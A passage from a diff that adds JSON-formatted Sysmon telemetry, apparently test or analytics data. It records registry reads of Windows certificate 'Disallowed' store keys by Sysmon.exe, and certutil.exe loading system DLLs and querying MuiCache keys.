"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498550000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498550000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498860000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498860000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499640000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499640000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499950016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": 